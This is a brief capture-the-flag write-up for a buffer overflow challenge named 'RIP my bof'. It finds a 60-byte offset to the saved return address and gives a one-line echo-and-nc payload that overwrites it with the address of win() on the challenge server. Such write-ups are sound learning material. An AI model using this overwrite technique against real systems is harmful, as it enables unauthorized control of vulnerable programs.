Skip to content

RIP my bof

The program outputs the stack before and after input; from this we can easily see that return address from vuln() is stored 60 bytes from input buffer \ GDB ./server -> info functions -> win() is at 0x08048586

echo -n -e "aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa\x86\x85\x04\x08\n" | nc thekidofarcrania.com 4902